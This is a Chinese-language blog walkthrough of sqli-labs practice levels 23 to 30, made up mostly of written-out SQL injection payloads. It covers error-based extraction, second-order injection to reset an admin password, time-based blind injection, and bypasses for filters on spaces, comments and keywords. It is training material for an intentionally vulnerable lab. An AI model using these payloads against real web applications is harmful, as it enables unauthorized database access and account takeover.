sqli 靶场 Level23-Level30 wp

最新推荐文章于 2024-04-26 12:09:43 发布
最新推荐文章于 2024-04-26 12:09:43 发布
阅读量483 收藏
点赞数
文章标签: java 数据库 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iplayvs2008/article/details/134296113
版权

level-23 (注释被过滤)

抓包

寻找注入点

  • id=1’,id=1’',成周期性变化

POC

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))--+'

结果:failed。怀疑–被过滤掉了,试试前后闭合方案

  • POC: id=1'+and+extractValue(1,concat(0x7e,user()))+and+'


结果:ok。

level-24(二次注入)

这一关比较特殊,是用类admin的账号去修改admin的密码。
思路:
(1)我们注册一个admin'--admin'#admin' and '1admin' or '1 的账号。这是第一次注入
(2)我们通过这个账号修改密码来修改隐藏的admin账户的密码。这是第二次注入
第一个'在这里是为了闭合前面的'
--后者#这里起到注释的效果
列出更改密码的sql更好理解:

usernamesql
admin'--update table_x set pasword='123' where username='admin'-- ' and password='456;
admin'#update table_x set pasword='123' where username='admin#'-- ' and password='456;
admin' and '1update table_x set pasword='123' where username='admin#'-- ' and password='456;
admin' or '1update table_x set pasword='123' where username='admin#'-- ' or password='456;
  1. 注册账号

    注意--后面是有空格,否则起不到注释的效果
  2. 登录新账号修改密码(456)
  3. 验证(密码456)


    ==》 成功登录admin

level-25 (and、or被过滤)

抓包

寻找注入点

''存在

POC

  • POC:id=-1'+or+extractValue(1,concat(0x73,user()))--+

发现and,or关键字被屏蔽了,还是不区分大小写的屏蔽


  • 使用union

结果:成功注入

  • 使用aandnd/anandd --> and

POC: id=-1'+aandnd+extractValue(1,concat(0x73,user()))--+

level-25a(and、or被过滤盲注)

抓包

寻找注入点

  • POC:id=1' and if(1,sleep(3),sleep(0))--+
    ==》不休眠
  • POC:id=1" and if(1,sleep(3),sleep(0))--+
    ==》休眠

==》存在注入

POC

  • step1: 猜字符串长度:POC: id=1+aandnd+if(length(user())=§1§,sleep(3),0)--+

==》14

  • step2:猜每个字符: POC: id=1+aandnd+if(substr(user(),§1§,1)='§a§',sleep(3),0)--+

==》root@localhost

level-26 (空格、注释被过滤)

抓包

查看正常请求和响应

寻找注入点

  • 使用单双引号,发现输出周期性变化,存在注入

POC

试试union select
  • POC: '+union+select+1,user(),3--+
    ==》 空格被过滤了


==》 因为空格被过滤了,所以and,union都使用不了,--+也使用不了
寻找其他替代方案:&&替代and,后’闭合替换--+

试试逻辑&
  • POC: id=1'&extractvalue(1,concat(0x7e,user(),0x7e))&'                        //字符串拼接&

    ==》 无反应
试试逻辑&&
  • POC: id=1'&&extractvalue(1,concat(0x7e,user(),0x7e))&&'                  //逻辑&&
试试&使用%编码

POC: id=1'%26extractvalue(1,concat(0x7e,user(),0x7e))%26'                    //字符串拼接,&使用%编码

==》 成功爆出

试试&&使用%编码

POC: id=1'%26%26extractvalue(1,concat(0x7e,user(),0x7e))%26%26'                      //&&使用%编码

==》 成功爆出

试试|

POC: id=1'|extractvalue(1,concat(0x7e,user(),0x7e))|'                //使用|

==》 成功爆出

试试||

POC: id=1'||extractvalue(1,concat(0x7e,user(),0x7e))||'   //使用||

==》 成功爆出

试试|使用%编码

POC: id=1'%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c'                        //|使用%编码

==》 成功爆出

试试||使用%编码

POC: id=1'%7c%7cextractvalue(1,concat(0x7e,user(),0x7e))%7c%7c'                     //||使用%编码

==》 成功爆出

试试()代替空格

POC: 1'aandnd(extractvalue(1,concat(0x7e,user())))='1

==》 成功爆出

试试0a%

==>爆破失败,%0a也被过滤掉了

总结

  • 空格被过滤了
    • 试试&,&&,|,||以及他们的%编码
    • 试试()
  • 因为空格被过滤了,不能使用--+

level-26a (空格、注释被过滤,盲注)

抓包

同level-26

寻找注入点

同level-26

POC

因为没有回显,只能通过盲注爆破

  • 获取字段的长度
    POC: 1'%26%26if(1=1,length(user())=§1§,0)=0%26%26'1


    ==》14
  • 爆破每个字符
    POC: id=1'%26%26if(1=1,substring(user(),§1§,1)='§a§',0)=0%26%26'1

    ==》root**@localhost ****  **

level-27 (union select被过滤)

抓包

寻找注入点


==>存在

POC

  • POC: 1'+%26%26+extractvalue(1,concat(0x7e,user(),0x7e))%26%26'
     ==> 过滤掉了空格
  • POC: id=1'+union+select+1,2,3,4--+

==》 union select被过滤了

既然空格和union select都被过滤了,试试使用&&、&、||、|、()、%0a+报错函数+前后闭合这种方式

POC: id=1'|extractvalue(1,concat(0x7e,user(),0x7e))|'

==》成功爆破。

当然使用其他%26%26、%26、||,也是可以的

level-27a (union select被过滤,盲注)

抓包

同level27

寻找注入点

同level27

POC

同level27,不过加上了盲注,盲注可以参考26a。

  • 求字符串长度

POC: 1"+and%0aif(length(user())=§1§,1,0)="1

  • 求每个字符
    POC: 1"+and%0aif(substring(user(),§1§,1)='§a§',1,0)="1

level-28 (过滤select、union)

抓包

注入点

  • 11"回显正常 ,1'回显错误,存在单引号 字符型注入
  • 2'%26%26'1'='1,回显为id=1,存在小括号

(2&&1=1)的结果是1,所以id不论怎么变都和id=1。若没有小括号,id等于几,回显多少关的数据

POC

  • 爆破列数
    id=1')+order+by+10--+
    因为有空格,所以–+不能使用
    id=1')%0aorder%0aby%0a10%26%26'1'=('1
    语句错误
    ==》数据库列数爆破失败,回显位只能不断尝试。
  • 爆破回显位
    • 测试过滤
      id=1')+union+select+1,2,3+or+'1'=('1

==》空格被过滤了
==》 #被过滤了
==》--被过滤了
==》union select被过滤了
==》union空白字符select也被过滤了

  • 尝试获取列数

id=1')%0aorder%0aby%0a10;%00
order by利用二分法爆破
注:%00代表NULL,用来表示字符串的结束,相当于C中"/0",因为用不了注释,这里使用%00

==》爆出列数4

  • 尝试%0a代替空格
    id=0')%0aunion%0aselect%0a1,2,3%0aor('1'='1

==》union%0aselect被过滤了

  • 尝试构造union select

id=0')%0aunionunion%0aselect%0aselect%0a1,2,3%0aor('1'='1

  • 再回显位爆破username,database

id=0')%0aunionunion%0aselect%0aselect%0a1,database(),3%0aor('1'='1

==> 爆破成功,user()虽然没爆破出来,我们可以利用第二个位置填入user,再试一次即可。
注:当然上面也可以使用;%00,即替换后面%0aor('1'='1

level-28a (过滤select、union,盲注)

抓包

寻找注入点

略,同level-28

POC

同level-28

当然你也可以尝试盲注

level-29 (waf保护)

前言:阻抗失衡一般用于解释。这一关要路径带入login.php,否则是没有WAP轻易爆破

抓包

寻找注入点

POC

level-30 (waf保护,盲注)

前言:同level-29,url路径带入login.php;

抓包

寻找注入点

POC

西西弗斯丶
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
phpstudy+靶场sqli-labs-master下载
11-08
phpstudy+靶场sqli-labs-master下载
sqli-labs靶场分析
RestoreJustice的博客
03-18 2110
这里是 基于WAF的一个错误引起的SQL注入,源代码level 29文件夹里有三个php文件,默认访问这个文件夹的index.php但这个文件是没有接入“WAF”的。在测试符号后面添加and sleep(5) --+,如果成功闭合前面的语句,则会执行sleep(5),利用延时注入的原理判断闭合方式。来看看第二种格式,第二种格式除了能像第一种格式一样得到数组内元素的值外,还能得到元素的索引值,并保存到$key变量中,如果数组的索引值未经过人工设定,则返回系统默认的设定值。第一个id的值符合规则,WAF放行。
Sqli-labs WP
qq_41996851的博客
05-08 443
环境搭建 需要phpstudy以及sqli-labs源码。把sqli-labs源码放好后,启动phpstudy的Apache和Mysql,如果无法启动mysql,考虑关闭mysql/删除本地mysql。 更换phpstudy数据库密码,并修改sqli-labs数据库连接文件; ********\phpstudy_pro\WWW\range\sqli-labs\sql-connections\db-creds.inc 如果嫌路径麻烦可以考虑创建网站: 这样就可以用域名和端口号访问,这里会直接走本地DNS解
sqli-bypass wp
iplayvs2008的专栏
11-10 437
# level 1。
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2732
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli靶场支持php7
04-21
sqli靶场支持php7
sqli-bypass靶场
11-10
sqli-bypass靶场
sqli-labs-master.zip
03-17
SQL-labs靶场,练习sql注入,适合新手练习漏洞基础,web安全,渗透,漏洞基础,典型漏洞,漏洞原理刨析,搭建在自己虚拟键,带源码,多分析 ,仅供学习
mybatisPlus使用MetaObjectHandler对字段进行更新
m0_56356631的博客
04-23 260
都是符合我们的预期的。
string模拟实现
m0_73969414的博客
04-23 1390
c++中string的模拟实现,面试必会知识点
实现自定义注解、实现自定义幂等性注解
qq_44721738的博客
04-23 517
添加 Spring AOP 依赖。创建自定义注解。创建一个新的 Java 注解类,通过@interface关键字来定义,并可以添加元注解以及属性。@Target(ElementType.METHOD) //表示作用于方法上@Retention(RetentionPolicy.RUNTIME) // 表示这个注解在运行时是可见的,这样 AOP 代理才能在运行时读取到这个注解编写 AOP 拦截(自定义注解)的逻辑代码。@Aspect@Component// 方法执行前的处理。
javaweb-SpringBoot基础
kussm_的博客
04-20 1288
Spring的官网(Spring的简介:Spring makes Java simple。Spring Boot 可以帮助我们非常快速的构建应用程序、简化开发、提高效率。创建一个子包controller。
第5 章 Consul服务注册与发现
a13763926743的博客
04-22 745
consul官网地址。
迭代器模式
LuckFairyLuckBaby的博客
04-23 443
迭代器模式(Iterator),提供一种方法顺序访问一个聚合对象中各个元素,而又不暴露该对象的内部表示。
Java的Arrays的基础知识
2301_80142564的博客
04-23 1136
Java中,Arrays是一个用于操作数组的工具类,它提供了很多静态方法来处理数组,如排序、搜索、比较等。这个类在java.util包中,因此在使用之前需要导入这个包。
Java | 冒泡排序算法实现
yingzix688的博客
04-24 689
题目描述 编写一个Java程序,实现冒泡排序算法。程序需要能够接收一个整型数组作为输入,并输出排序后的数组。 冒泡排序是一种简单的排序算法,它重复地走访过要排序的数列,一次比较两个元素,如果他们的顺序错误就把他们交换过来。走访数列的工作是重复地进行直到没有再需要交换,也就是说该数列已经排序完成。
java通过Comparator比较器对集合进行多属性连续分组内升降排序,以及null空值排最前或最后
最新发布
hkl_Forever的博客
04-26 131
一、排序数据准备,分别对 one、two、three 三个属性进行连续分组内排序。连续排序,并且把被排序属性值为null的排在最后。连续排序,并且把被排序属性值为null的排在最后。
sqli-labs-master靶场
09-20
sqli-labs-master是一个用于学习和实践SQL注入攻击的靶场。搭建完成后,你可以通过访问"http://localhost/sqli-labs-master/"来访问该靶场。通过点击"Setup/reset Database for labs"可以自动创建数据库、创建表并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值